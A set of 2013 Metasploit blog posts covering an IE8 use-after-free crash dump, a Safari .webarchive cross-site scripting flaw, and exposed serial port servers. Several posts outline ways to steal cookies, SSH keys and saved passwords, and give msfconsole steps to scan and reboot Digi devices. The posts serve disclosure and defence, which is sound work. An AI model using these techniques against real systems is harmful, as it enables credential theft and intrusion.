0563cfe0  00000000 00000000 0563cfc0 00000000  ..........c.....
0563cff0  00000010 00000000 00000000 d0d0d0d0  ................
0563d000  ???????? ???????? ???????? ????????  ????????????????
0563d010  ???????? ???????? ???????? ????????  ????????????????
0563d020  ???????? ???????? ???????? ????????  ????????????????

06a99fc8  ???????? ???????? ???????? ????????  ????????????????
06a99fd8  ???????? ???????? ???????? ????????  ????????????????
06a99fe8  ???????? ???????? ???????? ????????  ????????????????
06a99ff8  ???????? ???????? ???????? ????????  ????????????????
06a9a008  ???????? ???????? ???????? ????????  ????????????????
06a9a018  ???????? ???????? ???????? ????????  ????????????????
06a9a028  ???????? ???????? ???????? ????????  ????????????????
06a9a038  ???????? ???????? ???????? ????????  ????????????????


And of course, this invalid reference ends up with a crash when used by mshtml!CElement::Doc():

0:008> g
(5f4.2c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=63aae200 ebx=0563cfb0 ecx=06a99fc8 edx=00000000 esi=037cf0b8 edi=00000000
eip=6363fcc4 esp=037cf08c ebp=037cf0a4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
6363fcc4 8b01            mov     eax,dword ptr [ecx]  ds:0023:06a99fc8=????????


As of now, we are not aware of any patch from Microsoft specifically for IE8, but we will be updating this blog as soon as we hear something.  If you're a current IE8 user, then please consider the following workarounds:

  • For newer Windows, upgrade to Internet Explorer 9 or 10.
  • For Windows XP users, please use other browsers such as Google Chrome or Mozilla Firefox.
  • If for some reason you must use Internet Explorer 8, please use EMET.  Or, you can also try setting IE's security zone to High, and customize your Active Scripting settings.


Note that while Microsoft's advisory also suggests setting IE8's Internet security zones to 'High' for ActiveX controls, this, by itself, will not mitigate -- the exploitation technique used here does not leverage ActiveX controls at all. So, while that is generally good advice, it will not help in this case.


If you'd like to try out this Metasploit module to better validate your defenses, please feel free to download Metasploit here.  If you already have Metasploit Framework, you may just use the msfupdate utility to receive this module.  For Metasploit Pro users, you will see this module in the upcoming update.


Special thanks to: EMH



May 3rd - Microsoft advisory 2847140, no patch yet.
May 5th - Metasploit releases ie_cgenericelement_uaf exploit
May 8th - Microsoft releases "fix-it"
May 14th - Microsoft releases MS13-038 patch

When I wrote up the Metasploit Hits 1000 Exploits post back in December, I had to perform a little open source forensic work to get something resembling an accurate history of the Metasploit project -- after all, it's difficult for me to remember a time on the Internet without Metasploit. I traced the first mention of 1.0 back to this mailing list post in 2003. You know what that means, right? This year marks the 10th year of the Metasploit Framework!


metasploit-decal-competition.pngOne of the ways we're marking this anniversary is with something very much in keeping with our history. You may remember our T-shirt design contest back in 2011, won by Danny Chrastil and his elegant hexified Metasploit logo (with a cowsay back), and our Metasploit tattoo design competition. We had such a good experience with these contests that we're commemorating this auspicious anniversary with a new Metasploit laptop decal design contest... starting today!


The winning design will be selected on Friday, May 31, 2013.


You can enter by posting your design to this 99Designs project and tweeting a link to your design with the hashtag #metasploitdecal.


Once all designs are in, we'll select the finalists and ask the Metasploit Community to select the final winner.


Like last time, the winner will have the satisfaction of having their design plastered on hacker's gear (yes, we're doing laptop decals!). In addition, the triumphant designer will win a grand payout on 99Designs for permission to use the work.


So, think about what you want to see on your laptop, public or private property that you have gain prior, written authorization to tag, and maybe even tattooed on some Rapid7 employee's person, and tweet your designs!


Happy Birthday Metasploit!

Attacking WordPress Plugins

Someone once described PHP as a "web API for remote code execution," and it's true that PHP is definitely web programming without guardrails. This week's security news was dominated by a RCE vulnerability in a pair of wildly popular WordPress plugins, W3 Total Cache and WP Super Cache, which are written in (wait for it) PHP. Regular Metasploit contributors HD Moore, Juan Vazquez, and FireFart leaped into action to write up a Metasploit module to achieve code execution on WordPress-powered sites that use these plugins.


What does this mean for network defenders and auditors? Well, for many small businesses, and some larger ones, a WordPress-powered site may be the one touch point that these business have with their customers. Suffering a website defacement can damage these business's brands and reputations. However, there's no law that says a PHP-based attack must result in a website defacement. A persistent attacker can leverage this vulnerability to perform all sorts of mischief, such as compromising back-end database credentials, dumping stored user password hashes, or combining this attack with a local privilege escalation exploit to gain control over the entire server. This can all be done without leaving obvious signs of compromise on the website proper.


So, if you are responsible for a WordPress site, it would behoove you to use Metasploit to determine if you are, in fact, vulnerable to these kinds of exploits, and to see for yourself how far an exploit can go.



This update also comes with a shiny new way to steal credentials. The pentesters in the audience are no doubt aware of a tool called mimikatz that has been around for a while, but which invariably causes AV to lose its mind and ruin your day. Mimikatz, written by @gentilkiwi, is a tool that rummages through lsass.exe's memory looking for credential structures of various kinds. In most cases, it can grab cleartext passwords.


Now, thanks to @gentilkiwi's change to a compatible license (Creative-Commons-Attribution) and the integration efforts of Meatballs, Meterpreter can use this valuable technique completely in memory, saving you the headache of having to figure out how to run a packer.


Still Seeking Interns

I mentioned last week that the Metasploit Framework team is seeking an intern to help out over the summer in our secret underground exploit lair here in Austin. We've already gotten a number of good leads, so this week is about the last chance to get on board with our internship program. If you are passionate about open source security and want to spend your summer helping advance the state of the art with a team of world-class security professionals, check out the job requirements at and we'll see if we can't set up an interview in the next few days.


New Modules

This week, we have eight new modules, including the WordPress Total Cache exploit, Joe Vennix's Safari-based universal XSS module, Ben Campbell's implementation of waraxe's phpMyAdmin RCE exploit, a pair of SAP modules from Andras Kabai based on the research by Dmitry Chastuhin.



If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

owasp-top-10-webcast.pngFirst of all, a big thank you to all of you who participated in our OWASP Top 10 and Web App Scanning webcast last week. (If you missed it, you can view a recording here.) Because of an issue with the webcast platform, I wasn't able to see all of the audience questions while we were online. However, my colleagues were able to recover the unanswered questions, so I created questions and answers for them in the Metasploit discussion forum. Here they are:



If your question wasn't answered, please feel free to post it as a discussion in the Metasploit section. If you have a confidential question, please email

tldr: For now, don't open .webarchive files, and check the Metasploit module, Apple Safari .webarchive File Format UXSS


Safari's webarchive format saves all the resources in a web page - images, scripts, stylesheets - into a single file. A flaw exists in the security model behind webarchives that allows us to execute script in the context of any domain (a Universal Cross-site Scripting bug). In order to exploit this vulnerability, an attacker must somehow deliver the webarchive file to the victim and have the victim manually open it1(e.g. through email or a forced download), after ignoring a potential "this content was downloaded from a webpage" warning message2.


It is easy to reproduce this vulnerability on any Safari browser: Simply go to (or any website that uses cookies), and select File -> Save As... and save the webarchive to your ~/Desktop as metasploit.webarchive. Now convert it from a binary plist to an XML document (on OSX):


plutil -convert xml1 -o ~/Desktop/metasploit_xml.webarchive ~/Desktop/metasploit.webarchive


Open up ~/Desktop/metasploit_xml.webarchive in your favorite text editor. Paste the following line (base64 for <script>alert(document.cookie)</script>) at the top of the first large base64 block.







Now save the file and double click it from Finder to open in Safari:





You will see your cookies in an alert box. Using this same approach, an attacker can send you crafted webarchives that, upon being opened by the user, will send cookies and saved passwords back to the attacker. By modifying the WebResourceURL key, we can write script that executes in the context of any domain, which is why this counts as a UXSS bug.


Unfortunately, Apple has labeled this a "wontfix" since the webarchives must be downloaded and manually opened by the client. This is a potentially dangerous decision, since a user expects better security around the confidential details stored in the browser, and since the webarchive format is otherwise quite useful. Also, not fixing this leaves only the browser's file:// URL redirect protection, which has been bypassed many times in the past.


Let’s see how we can abuse this vulnerability by attempting to attack


Attack Vector #1: Steal the user's cookies. Straightforward. In the context of, simply send the attacker back the `document.cookie`. HTTP-only cookies make this attack vector far less useful.


Attack Vector #2: Steal CSRF tokens. Force the browser to perform an AJAX fetch of and send the response header and body back to the attacker.


Attack Vector #3: Steal local files. Since .webarchives must be run in the file:// URL scheme, we can fetch the contents of local files by placing AJAX requests to file:// URLs3. Unfortunately, the tilde (~) cannot be used in file:// URLs, so unless we know the user’s account name we will not be able to access the user’s home directory. However this is easy to work around by fetching and parsing a few known system logs4 from there, the usernames can be parsed out and the attacker can start stealing known local file paths (like /Users/username/.ssh/id_rsa) and can even "crawl" for sensitive user files by recursively parsing .DS_Store files in predictable locations (OSX only)5.


Attack Vector #4: Steal saved form passwords. Inject a javascript snippet that, when the page is loaded, dynamically creates an iframe to a page on an external domain that contains a form (probably a login form). After waiting a moment for Safari's password autofill to kick in, the script then reads the values of all the input fields in the DOM and sends it back to the attacker6.


Attack Vector #5: Store poisoned javascript in the user's cache. This allows for installing “viruses” like persisted keyloggers on specific sites... VERY BAD! An attacker can store javascript in the user's cache that is run everytime the user visits or any other page under that references the poisoned javascript. Many popular websites cache their script assets to conserve bandwidth. In a nightmare scenario, the user could be typing emails into a "bugged" webmail, social media, or chat application for years before either 1) he clears his cache, or 2) the cached version in his browser is expired. Other useful assets to poison are CDN-hosted open-source JS libs like google's hosted jquery, since these are used throughout millions of different domains.


Want to try for yourself? I've written a Metasploit module that can generate a malicious .webarchive that discretely carries out all of the above attacks on a user-specified list of URLs. It then runs a listener that prints stolen data on your msfconsole.


Unless otherwise noted, all of these vectors are applicable on all versions of Safari on OSX and Windows.


Disclosure Timeline


2013-02-22Initial discovery by Joe Vennix, Metasploit Products Developer
2013-02-22Disclosure to Apple via
2013-03-01Re-disclosed to Apple via
2013-03-11Disclosure to CERT/CC
2013-03-15Response from CERT/CC and Apple on VU#460100
2013-04-25Public Disclosure and Metasploit module published






  1. Safari only allows webarchives to be opened from file:// URLs; otherwise it will simply download the file.
  2. Alternatively, if the attacker can find a bypass for Safari's file:// URL redirection protection (Webkit prevents scripts or HTTP redirects from navigating the user to file:// URLs from a normal https?:// page), he could redirect the user to a file URL of a .webarchive that is hosted at an absolute location (this can be achieved by forcing the user to mount an anonymous FTP share (osx only), like in our Safari file-policy exploit). Such bypasses are known to exist in Safari up to 6.0.
  3. Unlike Chrome, Safari allows an HTML document served under the file:// protocol to access *any* file available to the user on the harddrive
  4. file:///var/log/install.log

  5. file:///Users/username/Documents/.DS_Store

  6. X-Frame-Options can be used to disable loading a page in an iframe, but does not necessarily prevent against UXSS attacks stealing saved passwords. You can always attempt to pop open a new window to render the login page in. If popups are blocked, Flash can be used to trivially bypass the blocker, otherwise you can coerce the user to click a link.

Pull Requests: Want to help?

Metasploit has a first world problem: We get so much code from contributors out in the world, it gets hard to keep up. Most open source projects aren't popular enough to warrant more than three or four contributors, total. Metasploit has over two hundred, last I checked. We're no Rails (those guys have over 2,000 contributors), but for security software, that's not too bad.


The problem is, our backlog of outstanding pull requests (PRs) is steadily increasing, and now we're now floating about a hundred outstanding pull requests. Since Metasploit is fundamentally a communal effort, I'm hopeful that you generous folks out there in Open Source Land can maybe help us take a bite out of this backlog.


First off, check out the new Landing a Pull Request guide. While you might think that this guide is meant only for Rapid7 employees, it's not. The power of GitHub as a source control management system lies in the ability for literally anyone to contribute fixes in a distributed way. Let me quote from the Collaboration between Contributorssection:

If Alice knows a solution to Bob's pull request that Juan pointed out, it is easy for Alice to provide that solution by following [this procedure]. Git blame will still work correctly, commit histories will all be accurate, everyone on the pull request will be notified of Alice's changes, and Juan doesn't have to wait around for Bob to figure out how to use send_request_cgi() or whatever the problem was."


What this means is that if you see something languishing in our pull queue, and you think you can help move things along, go for it! Most of the time, PRs don't get landed due to a lack of verification or testing. So, while some old PR might get solved with some bugfixes, more likely, what we really need is some solid verification procedure to prove that the PR actually works. Even better, for non-module PRs, would be some rspec tests added to the outstanding PR. Merely +1'ing a PR isn't likely to be very helpful, but squeaky wheels do get greased. The point is, the opportunities to collaborate on advancing the state of the art in open source security development really are there for the taking.


Intern Sought

Speaking of contributing, summer is approaching, and that means it's time to start trolling (trawling?) for interns. We have a pretty formidible job description up, but if you're reading this blog, you probably already have some deep and abiding interest in open source security software, so feel free to pop your resume off to me at todb at metasploit dot com. If you already live here in Austin, then hooray for you, since this internship requires a fair amount of in-person showing up to the office. If you already have contributed code to Metasploit or some other open source project, then you are already way ahead of the game and I would be very interested in talking to you.


If interning isn't your thing, but you know an enterprising college student who might be a good fit, give them the shortlink:


Armitage and MSFGui

Finally, as mentioned in the Metasploit 4.6.0 release notes, we've removed the two alternate Java front ends, Armitage and MSFGui, from Metasploit's main distributions. Those projects, run by Raphael @armitagehacker Mudge and Matthew @scriptjunkie Weeks, respectively, are now being distributed separately from the framework source repository. You can track them at (for Armitage) and (for MSFGui). So, if you are sitting on a source checkout of Metasploit and you find that your Java client doesn't work any more, that's probably why. You can get your install back in shape by just fetching from upstream, direct from those guys.


New Modules

We've got four new modules this week. We've been busy preparing for conference season, so module throughput has been a little slower than usual.




If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.



At the InfoSec Southwest 2013 conference I gave a presentation on serial port servers. This presentation was drawn from research that tried to determine how prevalent and exposed internet-connected serial port servers are. The results were pretty scary - authentication was rarely implemented and the types of devices exposed ranged from corporate VPN servers to traffic signal monitors. This post attempts to summarize that presentation, but the deck itself has more details. If you are unfamiliar with serial port servers or looking for some additional background, please consult the FAQ.




Serial port servers, also known as terminal servers, are designed to allow remote access to the serial port of another device over TCP/IP.

These devices serve three primary functions

  • Provide remote access to non-networked equipment such as environment controls, industrial automation, and monitoring systems.
  • Provide remote access, location tracking, and monitoring of physically mobile systems, including vehicles and cargo containers.
  • Provide out-of-band access to network and power equipment for the purpose of recovery in the case of an outage.


A typical serial port server is a box the size of a home router with one or more serial ports on one side and an ethernet, wireless, or mobile interface on the other. The serial port is connected to a target device, such as a router, server, or industrial control system, and the serial port server is configured to allow remote access to this port. Some examples of serial port servers are shown below.









There are three common ways for a user to access a remote serial port

  1. They login via telnet, ssh, or the web interface and directly type commands on the serial device.
  2. They connect to a specific TCP port that acts as a proxy for the serial port, allowing immediate access to the serial device.
  3. They configure vendor-specific software to access the serial port over a proprietary protocol.


In the first case, the serial port server requires some form of authentication before the user can interact with the serial-connected device. The most secure method is over a SSH session, but unless the attacker can eavesdrop on your connection, even telnet will do in a pinch.


In the second case, this is typically a clear-text TCP connection, accessed using the telnet command, and without any imposed authentication by the serial port server. If the serial-connected device requires authentication to access the serial console, this is the only layer of defense. The third case is usually identical, however some protocols (RealPort) can be configured to use both encryption and shared key authentication. In practice, however, these are mostly clear-text and unauthenticated as well.


In summary, we have a serial port exposed directly to the network. If the serial port is connected to a device that requires authentication, such as a Linux server, or a Cisco IOS router, it is theoretically protected from unauthorized access unless the attacker knows the correct password. Many serial devices do not require authentication and instead assume that if you are physically connected to a serial port, you probably have the right to configure the system.



Serial port servers change the authentication model in two significant ways. First, the concept of trusting a physical port goes out the window when that port is exposed to the internet, especially without an initial layer of authentication. Second, there is a significant difference between a SSH or telnet session and an authenticated serial console. If the user disconnects from SSH or telnet, the session is closed. This is not the case with serial consoles unless the device automatically logs out due to inactivity. Very few systems support inactivity timers on serial consoles (Cisco is one of the exceptions). An attacker just has to wait for a valid user to authenticate. Once logged in, the attacker can either hijack the serial port connection or wait for them to become idle and then steal a pre-authenticated shell on the target device.


The end result is that both the TCP proxy and proprietary access protocols lead to a situation where most of the serial ports they expose either require no authentication for an attacker to access. An analysis of internet-exposed serial port servers uncovered over 13,000 root shells, system consoles, and administrative interfaces that did not require authentication, many of which had been pre-authenticated by a valid user.


An example of an serial port connected to a pre-authenticated root shell is shown below.


$ telnet 2001


Connected to

Escape character is '^]'.


# uname -v

FreeBSD 7.3-STABLE #0


# uptime

3:48AM  up 701 days, 13:22, 1 user, load averages: 0.00, 0.00, 0.00




Internet Exposure


Over 114,000 unique IPs were identified as either Digi International or Lantronix serial port servers using the Simple Network Management Protocol (SNMP) with the community "public". Over 95,000 of these systems were exposed to the internet through mobile connections such as GPRS, EDGE, and 3G. Another 14,000 unique IPs were identified running Digi, or Digi-based devices using Digi's proprietary Advanced Device Discovery Protocol (ADDP). FTP banners were used to identify another 8,000 Digi devices. Another 500 Lantronix systems were identified using their telnet banners. Web server headers, SSL certificates, and telnet prompts were useful, but generally not conclusive on their own to identify serial port servers.


Three sets of data were used to identify open serial consoles. First, the Internet Census 2012 data was analyzed for TCP ports 2001-2010 and 3001-3010. These ports are commonly used by Digi and Lantronix devices as TCP proxies for the first 10 configured serial ports. Second, the raw responses for port 771 were analyzed to detect instances of the RealPort proprietary service used by Digi serial port servers. Finally, the devices running the RealPort service were queried to obtain the banners from each attached serial ports. The final result was a set of banners that could be matched against common serial console and device menu fingerprints. Overall, a little over 13,000 unique serial ports were exposed that offered some form of system shell, console, data feed, or administrative menu.




Metasploit Modules


A handful of Metasploit modules have been written to identify and assess serial port servers made by Digi International. To use these modules, first download Metasploit, and access the Metasploit Console or the modules tab of the Metasploit web interface.


ADDP Discovery: auxiliary/scanner/scada/digi_addp_version

The digi_addp_version module can be used to identify Digi and Digi-based devices that have the ADDP service enabled.


$ msfconsole

msf > use auxiliary/scanner/scada/digi_addp_version

msf auxiliary(digi_addp_version) > set RHOSTS

msf auxiliary(digi_addp_version) > run

[*] Finding ADDP nodes within> (1 hosts)

[*] ADDP hwname:Digi Connect WAN Edge10 hwrev:0

fwrev:Version 82001160_J1 01/04/2007

mac:00:40:9D:2E:AD:B2 ip: mask:  

gw: dns: dhcp:false 

ports:1 realport:771 realport_enc:false magic:DIGI


ADDP Reboot: auxiliary/scanner/scada/digi_addp_reboot

The digi_addp_reboot module can be used to reboot Digi devices that have the ADDP service enabled. In contrast to the version module, you may need to set the ADDP_PASSWORD variable to the "root" password if the default of dbps is not configured. Keep in mind that many devices that are based on the Digi platform do not let the user configure or disable the ADDP service at all. In addition to rebooting the device, ADDP can be used to change the IP configuration, including the DNS server, which can lead to some particularly nasty attacks when the Digi device is used as a router.


$ msfconsole

msf > use auxiliary/scanner/scada/digi_addp_reboot

msf auxiliary(digi_addp_reboot) > set RHOSTS

msf auxiliary(digi_addp_reboot) > run


RealPort Discovery: auxiliary/scanner/scada/digi_realport_version

The digi_realport_version module can be used to identify Digi and Digi-based devices that use the RealPort protocol to expose serial ports. The module will identify the platform in use and indicate how many physical serial ports are present on the device.


$ msfconsole

msf > use auxiliary/scanner/scada/digi_realport_version

msf auxiliary(digi_realport_version) > set RHOSTS

msf auxiliary(digi_realport_version) > run

[*] Digi Connect WAN ( ports: 1 )



RealPort Discovery: auxiliary/scanner/scada/digi_realport_serialport_scan

The digi_realport_serialport_scan module will attempt to retrieve a banner from each configured serial port at various baud rates. Keep in mind that the RealPort TCP service does not have to live on port 771, so portscan the device and use the ADDP modules to identify the realport service. The example below identifies a Linux root shell present on serial port 1.


$ msfconsole

msf > use auxiliary/scanner/scada/digi_realport_serialport_scan

msf auxiliary(digi_realport_serialport_scan) > set RHOSTS

msf auxiliary(digi_realport_serialport_scan) > run

[*] [port 1 @ 9600bps] "[root@localhost root] # \r\n"



Not Serial


Serial port servers were the focus of this research, but as the project progressed it became clear that many of these devices are also used to manage other types of connections. For example, security systems may be connected via Digi WAN devices, but instead of using a serial port, the Digi device is monitoring signals on GPIO pins. In the case of smart grid power meters, the Digi device was using Zigbee to communicate with the meters, and streaming the data back over MODBUS.  Even though the primary use case is often serial port access, these devices are used to connect, translate, and proxy much more than that.





The biggest challenge right now is awareness. Few organizations are aware that their equipment can be accessed through serial ports connected through mobile networks. In some cases, the organization may assume that their specific mobile configuration prevents access from the internet, when that may not be the case. The wide use of mobile connections makes detection and response much more difficult. There are some basic steps that can significantly reduce the risk of an attack through an exposed serial port server.


  • Only use encrypted management services (SSL/SSH)
  • Set a strong password and non-default username
  • Scan for and disable ADDP wherever you find it
  • Require authentication to access serial ports
    • Enable RealPort authentication and encryption for Digi
    • Use SSH instead of telnet & direct-mapped ports
  • Enable inactivity timeouts for serial consoles
  • Enable remote event logging
  • Audit uploaded scripts





There are over 114,000 serial port servers accessible from the internet, with over 95,000 connected via mobile providers. These expose over 13,000 serial ports that offer some level of administrative access to any attacker that happens to connect. There is a little awareness of how exposed these devices are and no real push by either users or vendors to improve the situation. A list of vulnerable organizations can be pulled from public sources such as SHODAN and the Internet Census 2012 data set. The sheer number of critical, bizarre, and just plain scary devices connected to the internet through serial port servers are an indication of just how dangerous the internet has become.

Java Payload Cleanup

If you've been watching the Metasploit source repository, you will have noticed some movement in Java Payload land -- specifically, PR#1217, which landed this week. Thanks to the refactoring efforts of Michael @mihi42 Schriel, testing by @Meatballs, and integration from James @egyp7 Lee, the Javapayload and Java Meterpreter projects can now more easily be hacked at with Eclipse, a preferred IDE for Java nerds. There's also a slew of new unit tests, so you have more assurance that your hackery won't break existing functionality. This is good news for you if you are a) more of a Java guy than a Ruby guy, and b) you want to make meaningful contributions to the Metasploit framework. Thanks a ton, guys!


ZDI Sport Fishing

This week also sees a trio of ZDI-derived Metasploit modules -- we have exploits now for ZDI-13-051, ZDI-13-052, and ZDI-13-053. They all target the HP Intelligent Management Center (IMC), and all three were initially reported to the Zero Day Initiative (ZDI). ZDI, if you weren't aware, is now part of HP's new HP Security Research (HPSR) group. Yes, that's a lot of acronyms.


ZDI-disclosed vulnerabilities are especially attractive for some exploit developers, including our own Juan Vazquez. By dint of being disclosed by ZDI, we know for sure that some money has already changed hands. This makes them de-facto "high value" vulnerabilities, and not just goofy crashes or exposed in unlikely, contrived attack scenarios. In addition, we know that there are organizations out there who put a premium on protecting against ZDI vulns. Those folks like to be able to use Metasploit modules to test the efficacy of their defenses, both pre- and post-patch.


This is all incidental to the fact that ZDI vulns are generally rewarding to research. It's like fishing in a pond that you know is stocked; it's a lot easier to be confident and be successful when you know for sure that there is an exploit worth catching there. If you're looking to get involved with exploit development on targets that aren't just toys or CTF targets, ZDI can provide a pretty rich target landscape.


New Modules

Besides HP IMC, we of course have a passel of new modules. Passel?  How about a clutch? No, a murder. Of course. Below is this week's murder of Metasploit modules.




If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Filter Blog

By date: By tag: